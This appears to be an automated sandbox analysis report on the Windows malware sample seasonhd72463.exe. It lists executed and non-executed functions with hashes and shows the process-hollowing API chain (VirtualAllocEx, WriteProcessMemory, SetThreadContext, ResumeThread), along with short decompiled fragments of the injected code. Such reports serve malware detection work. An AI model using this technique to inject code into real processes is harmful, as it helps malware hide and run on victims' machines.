                                                Analysis Process: seasonhd72463.exe PID: 1812 Parent PID: 1532 seasonhd72463.exeCOMMON

                                                Executed Functions

                                                Function 001DEB20, Relevance: .2, Instructions: 236COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e24cdfcf2552676d828d1979f02b72101319d5ebbf5a1c6d67a49fbabbdf5f4f
                                                • Instruction ID: 0e1e832c20b7f79fc7d3b3b0ee37480128c683079c87f3e9580d3ac3cd66f4dc
                                                • Opcode Fuzzy Hash: e24cdfcf2552676d828d1979f02b72101319d5ebbf5a1c6d67a49fbabbdf5f4f
                                                • Instruction Fuzzy Hash: 42A11970E002188BDB14DFE9D484AEEFBF6BF88305F65852AD809AB344DB749941CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DEB10, Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4b680865808c80413e604b34de47053c3d622f91f05e34cd014f872726b1d93
                                                • Instruction ID: 8484c8da5b163aa3a9de9421798596f7579ffe47e0e2fe015b0df22b9edd765e
                                                • Opcode Fuzzy Hash: d4b680865808c80413e604b34de47053c3d622f91f05e34cd014f872726b1d93
                                                • Instruction Fuzzy Hash: 0F810674E042188FDB04DFE9D844AEEBBF2BF88306F25852AD809AB354DB749945CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D67C0, Relevance: .2, Instructions: 194COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff29ed78dfa21f2a5717d28bc3e5b5cdc44b7483f3c817e81b374e708cf71bbf
                                                • Instruction ID: 93d883485281aa98dd6af697ea170f7e971e518c9f80e83a3946dd4e648d568d
                                                • Opcode Fuzzy Hash: ff29ed78dfa21f2a5717d28bc3e5b5cdc44b7483f3c817e81b374e708cf71bbf
                                                • Instruction Fuzzy Hash: 1C81CFB0D04229CFDF28CFA9C9806ADBBB2BF89304F20906AD559B7355DB345946CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D6AF8, Relevance: .2, Instructions: 178COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16460d2fff903c527829cbaad78a8668d6380fc86ba24b0c3603e30632aded5d
                                                • Instruction ID: b90ef8c7bcc95d3bff6189cd605dd95e9936e8432f437cb9eeb7dc1f1dae278d
                                                • Opcode Fuzzy Hash: 16460d2fff903c527829cbaad78a8668d6380fc86ba24b0c3603e30632aded5d
                                                • Instruction Fuzzy Hash: C271D5B4E052188FCB08CFE9C484AAEFBF2FF89310F24952AD409A7355D734A981CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D67AF, Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b81540c82a430cb7700961b7f765b689f49fab61af99c80f17524e0d17750539
                                                • Instruction ID: b48e3673f1d07ab0a7684859f6229c0a3f93e60b6d054ab70b6baaa5834e07f5
                                                • Opcode Fuzzy Hash: b81540c82a430cb7700961b7f765b689f49fab61af99c80f17524e0d17750539
                                                • Instruction Fuzzy Hash: 6F51D070D05229CFDB18CFAAC9806AEBBF2BF89304F21C0AAD459A7355DB3459469F50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005D0048, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005D030F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423850047.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 7ad09be668273d36ef58a2caf1db0379b01e8a22d2422c34497a2161ea3dfc5f
                                                • Instruction ID: 0f5f69d9f058de8279a205cc87775106c852570ae030b0deb986119b1a087b4b
                                                • Opcode Fuzzy Hash: 7ad09be668273d36ef58a2caf1db0379b01e8a22d2422c34497a2161ea3dfc5f
                                                • Instruction Fuzzy Hash: CDC10470D002198FDF24DFA8CC41BEDBBB1BB49304F1095AAD959B7280DB749A85CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DF9F8, Relevance: 1.6, APIs: 1, Instructions: 123injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DFAD3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 1573969f0cb96d248b967d0dd74dd2069ef07931beb5c7d481ee1ade0febfcc5
                                                • Instruction ID: aa083b75b88bcfb71fc62a31bcb6d955d7d99e6c5cdfa28fa30ee607d76d6f47
                                                • Opcode Fuzzy Hash: 1573969f0cb96d248b967d0dd74dd2069ef07931beb5c7d481ee1ade0febfcc5
                                                • Instruction Fuzzy Hash: 6F41BEB4D012589FCF00CFA9D984ADEBBF1BF49304F24942AE815B7240D7749A45CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DFA00, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DFAD3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: badbe59aeca6c017bff9170db9612f4bc924b21c3bd8be1b4577a915bb61b260
                                                • Instruction ID: d619e0e3a3251dc806a99fe575f53322df14efd67a9e48c1dfeb06b252a1c026
                                                • Opcode Fuzzy Hash: badbe59aeca6c017bff9170db9612f4bc924b21c3bd8be1b4577a915bb61b260
                                                • Instruction Fuzzy Hash: 1141AAB4D012589FCF00CFA9D984AEEBBF1BF49314F24942AE819B7240D774AA45CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DFB60, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DFC12
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 27c5c70e864a99a15b3e07ffb33f19bb0678dd79bc0824b1f08f022a6f9fb74f
                                                • Instruction ID: 75c34a42a93e3b30cc9bf0988a3f923d4687b928beabbf359fb5da4a533dd043
                                                • Opcode Fuzzy Hash: 27c5c70e864a99a15b3e07ffb33f19bb0678dd79bc0824b1f08f022a6f9fb74f
                                                • Instruction Fuzzy Hash: FB41B8B8D002589FCF00CFA9D880AEEFBB5BF49310F14942AE815B7200D774AA56CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DF8D8, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DF982
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 233121727249af1724ef92ab480d26500a4d410f1442bea041e9448099fc21ac
                                                • Instruction ID: 43f7f6082b2b7062518574a7fcbb09a29f0760de43628413f1401cf0427ea356
                                                • Opcode Fuzzy Hash: 233121727249af1724ef92ab480d26500a4d410f1442bea041e9448099fc21ac
                                                • Instruction Fuzzy Hash: 8C4187B8D002589FCF14CFA9D880AEEBBB5BB49314F24942AE815B7300D775A946CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DF7A0, Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DF857
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 32886a8be0b9947ae6426be7e63651a27121c86526843f678f709c685de0792d
                                                • Instruction ID: 2b35bd282b880a30be643e411db7a1ff224ca18a22ad69f326315c80a365e0a2
                                                • Opcode Fuzzy Hash: 32886a8be0b9947ae6426be7e63651a27121c86526843f678f709c685de0792d
                                                • Instruction Fuzzy Hash: 4341CCB4D012589FCB14CFA9D884AEEBBB1BF49314F24842AE415B7340D778AA86CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DF7A8, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DF857
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: c1ea855ad3d1c44541e75f3713679a264ae587147a7d60ca018a9f674eea3953
                                                • Instruction ID: 5f477578def32995be30786db523dd2c6ca3b1d2193bae29615534d4a9880e20
                                                • Opcode Fuzzy Hash: c1ea855ad3d1c44541e75f3713679a264ae587147a7d60ca018a9f674eea3953
                                                • Instruction Fuzzy Hash: 0841ACB4D012589FCB10CFA9D884AEEFBB5BF49314F24842AE415B7344D778AA85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DF6B1, Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DF736
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 647ee060e601d91b38e30fb6d8c29231dba9c8283a25e8f51ce91217867493c9
                                                • Instruction ID: b1d66a0db4eb8aa74c07123a50ef38f26c24d91c55040495ffdf385386fb0bb1
                                                • Opcode Fuzzy Hash: 647ee060e601d91b38e30fb6d8c29231dba9c8283a25e8f51ce91217867493c9
                                                • Instruction Fuzzy Hash: 4931CCB8D012589FCB10CFA9E884ADEFBB5AF49314F14942AE815B7300D734A942CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DF6B8, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DF736
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 8ea91f832f380499c8fd000d4e87a07fad1d09a10f394dd3972675e6cfe7c373
                                                • Instruction ID: a708bad304a534e4b2b7f8df5c37fee4d4f5287c4c2665efad776fd714aebcc5
                                                • Opcode Fuzzy Hash: 8ea91f832f380499c8fd000d4e87a07fad1d09a10f394dd3972675e6cfe7c373
                                                • Instruction Fuzzy Hash: 3D3199B8D012189FCB14CFA9D884ADEFBB5AB49314F14942AE815B7340D775A942CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D1D4, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 619cd60cf4a8023bd006a9862acac238cafe118783b49d76bd518c4ca96f4c98
                                                • Instruction ID: 684ce5c794d822d6293020ab8a456df9b07869edf8d83ad7cba10187a7491949
                                                • Opcode Fuzzy Hash: 619cd60cf4a8023bd006a9862acac238cafe118783b49d76bd518c4ca96f4c98
                                                • Instruction Fuzzy Hash: E82104B1604204EFDB15CF60F9C0B26BBA5FB84718F24CAADE8094B242C736D856CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D01C, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e269878ab6353590da27a943180823c24c84e772e8930ff5ad684cc18a8f679
                                                • Instruction ID: 9b9e1d7039919dbe7b12f462face68c84fbd46b39a233bb21dcec6531df0b4bf
                                                • Opcode Fuzzy Hash: 7e269878ab6353590da27a943180823c24c84e772e8930ff5ad684cc18a8f679
                                                • Instruction Fuzzy Hash: C621F5B5604204DFDB18CF64F884B16BB65EB84B14F34C9A9E8494B246C336D847CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D006, Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8550b84a7ff67e9d23d245dacad51e5bbc45fc32d98bbf05b1e8bff841eb056
                                                • Instruction ID: 4ce991322aa73ed84faebf04c8f2b156396a78932751525961628a7619971760
                                                • Opcode Fuzzy Hash: b8550b84a7ff67e9d23d245dacad51e5bbc45fc32d98bbf05b1e8bff841eb056
                                                • Instruction Fuzzy Hash: B72183754083849FCB06CF14E994715BF71EF46714F28C5DAD8458F256C33AD856CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D1CF, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9cc674708dcb2013f65d5aff03b6909f9b9dd81469d1f0a7c98842689a4c11e3
                                                • Instruction ID: e491cbac92f73483479ae08d48015375d22b94f5eca66e70aec665ad05ae0836
                                                • Opcode Fuzzy Hash: 9cc674708dcb2013f65d5aff03b6909f9b9dd81469d1f0a7c98842689a4c11e3
                                                • Instruction Fuzzy Hash: 30119D75504284DFDB12CF14E5C4B16FFA1FB84314F28C6ADD8494B656C33AD85ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012D1D5, Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423134451.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f524ef13744641833b162756a548fe6af6bbb8c5f128384a2cb672ae9f7dd79
                                                • Instruction ID: c498e86a7d65153a7fb5b1a59ef7913721f9cbc5941fc2f36ba69909e5d1083d
                                                • Opcode Fuzzy Hash: 8f524ef13744641833b162756a548fe6af6bbb8c5f128384a2cb672ae9f7dd79
                                                • Instruction Fuzzy Hash: AD01F231408360DAE7208A65FC88B67BB9CEF91724F18C52AED051A282C338D950CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012D1D4, Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423134451.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7bbf5dd06991797b31c4483d3f29b5dba19212381750e1f4297b96a0ae82c47
                                                • Instruction ID: fe83362c6e42d2477729a8042f56140c256a0b06b8c8da960a1b7043748aea5b
                                                • Opcode Fuzzy Hash: b7bbf5dd06991797b31c4483d3f29b5dba19212381750e1f4297b96a0ae82c47
                                                • Instruction Fuzzy Hash: 7BF062714046549BEB608E15E888B63FF98EF91734F18C55AED485B286C378DC44CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 001D8A80, Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (FV$@2)m$t@V
                                                • API String ID: 0-1773883344
                                                • Opcode ID: a0a2c318c2b097e4c07de5a7567658354bfa2891a67a3544f12842f95eeee031
                                                • Instruction ID: 245570a34174ede02b30df39c903f6e3e1e644c77c2227bea7757484a85375cb
                                                • Opcode Fuzzy Hash: a0a2c318c2b097e4c07de5a7567658354bfa2891a67a3544f12842f95eeee031
                                                • Instruction Fuzzy Hash: EA517130D142188FD744EFB9E890A9E7BF2AF99304F04893AD1149B364EF745A49DF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D8A90, Relevance: 3.9, Strings: 3, Instructions: 144COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (FV$@2)m$t@V
                                                • API String ID: 0-1773883344
                                                • Opcode ID: 80afaf1863b8453983002ca0bd3168d7194a4799184f9e9bed73ed5efa1b1e8f
                                                • Instruction ID: 94b23c64c683ad72c93ff1328319c0a51d6f606745a2dc5719727b872d99d7b5
                                                • Opcode Fuzzy Hash: 80afaf1863b8453983002ca0bd3168d7194a4799184f9e9bed73ed5efa1b1e8f
                                                • Instruction Fuzzy Hash: 68516070D102198FD744EFBAE890A9E7BF2AB88304F00893AD1149B324EF746A45DF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005D1C8E, Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423850047.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: "$)$.
                                                • API String ID: 0-1221665302
                                                • Opcode ID: e89d0213b66c8a4120235e013ac62a29aa62d06b2e3e53c0a307d8b4c0889c68
                                                • Instruction ID: 9dfa7d1e222521fb5d05956d26af973acbff7e9bc4b2aa62d219c7ff8ebb14a9
                                                • Opcode Fuzzy Hash: e89d0213b66c8a4120235e013ac62a29aa62d06b2e3e53c0a307d8b4c0889c68
                                                • Instruction Fuzzy Hash: 5631C034E45628DBCB24DF68E8487EDBBB5BB49305F0049EAD409A7341DB305E84CF89
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D9918, Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: UUUU
                                                • API String ID: 0-1798160573
                                                • Opcode ID: 6278a15abf94fc5710315b8f28217da5d470a1c41b5a94b492ac48af4cab140f
                                                • Instruction ID: f24a5fe67b3a36d7a91aef06a736ffda58e6173fc23f3d193af2c3c5faa7c8a0
                                                • Opcode Fuzzy Hash: 6278a15abf94fc5710315b8f28217da5d470a1c41b5a94b492ac48af4cab140f
                                                • Instruction Fuzzy Hash: 43513C70E106288FEBA4CFADC98578DBBF2AB48304F5485A5D51CEB205D7349A86CF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: seasonhd72463.exe PID: 2820 Parent PID: 1812 seasonhd72463.exeCOMMON

                                                Executed Functions

                                                Function 0029A036, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 481nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 0029A19F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461761679.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                Similarity
                                                • API ID: InformationProcessQuery
                                                • String ID: 0
                                                • API String ID: 1778838933-4108050209
                                                • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                • Instruction ID: 121c9f0e51c26ff4d035eb02a867f08b255ae5aa8bfe7ae45064ec4231b5664c
                                                • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                • Instruction Fuzzy Hash: 67F12F70928A4C8FDFA5EF68C895AEEB7E0FB98304F40462AE44ED7251DF349641CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A40A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 23%
                                                			E0041A40A(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t23;
				void* _t32;
				intOrPtr* _t34;
				void* _t36;

				asm("invalid");
				_t18 = _a4;
				_t34 = _a4 + 0xc48;
				E0041AF60(_t32, _a4, _t34,  *((intOrPtr*)(_t18 + 0x10)), 0, 0x2a);
				_t5 =  &_a40; // 0x414a31
				_t7 =  &_a32; // 0x414d72
				_t13 =  &_a8; // 0x414d72
				_t23 =  *((intOrPtr*)( *_t34))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __esi, _t36); // executed
				return _t23;
			}







                                                0x0041a40d
                                                0x0041a413
                                                0x0041a41f
                                                0x0041a427
                                                0x0041a42c
                                                0x0041a432
                                                0x0041a44d
                                                0x0041a455
                                                0x0041a459

                                                APIs
                                                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1JA$rMA$rMA
                                                • API String ID: 2738559852-782607585
                                                • Opcode ID: 168a3a6ba6aad3fbecb21687f97696ce2b573daee3d708162e6887467be85324
                                                • Instruction ID: 4303057fbaaf29cad4171ea9010ed2377fecf0c0394d7fa1fb71fc5b5dab864a
                                                • Opcode Fuzzy Hash: 168a3a6ba6aad3fbecb21687f97696ce2b573daee3d708162e6887467be85324
                                                • Instruction Fuzzy Hash: 52F0C4B6200118AFCB14DF89DC81EEB77A9AF8C754F158248BA1DA7241C630E811CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                0x0041a413
                                                0x0041a41f
                                                0x0041a427
                                                0x0041a42c
                                                0x0041a432
                                                0x0041a44d
                                                0x0041a455
                                                0x0041a459

                                                APIs
                                                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1JA$rMA$rMA
                                                • API String ID: 2738559852-782607585
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0029A042, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 0029A19F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461761679.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                Similarity
                                                • API ID: InformationProcessQuery
                                                • String ID: 0
                                                • API String ID: 1778838933-4108050209
                                                • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                • Instruction ID: 668cfba7c8405fa2bf171a2e00d8834e4bf69665346f1d8eac5aa7919215b7a9
                                                • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                • Instruction Fuzzy Hash: 21512B70928A9C8FDB69EF68C8946EEB7F4FB98304F40462AD44AD7211DF309645CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A35A, Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 29%
                                                			E0041A35A(void* __eax, void* __ebx, void* __eflags, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t38;
				void* _t41;
				void* _t58;
				intOrPtr* _t60;

				if(__eflags != 0) {
					_t60 = __eax + 0xc44;
					E0041AF60(_t58);
					return  *((intOrPtr*)( *_t60))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, __eax, _t60, _t41);
				} else {
					asm("scasd");
					_t32 = _v0;
					_t3 = _t32 + 0xc40; // 0xc40
					E0041AF60(_t58, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
					_t38 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
					return _t38;
				}
			}








                                                0x0041a35b
                                                0x0041a3cf
                                                0x0041a3d7
                                                0x0041a409
                                                0x0041a35d
                                                0x0041a35e
                                                0x0041a363
                                                0x0041a36f
                                                0x0041a377
                                                0x0041a3ad
                                                0x0041a3b1
                                                0x0041a3b1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                                                • Instruction ID: 344b71f7b3a199d2ddbb085444571a9311c99876aed05395be72b1e04dcb046e
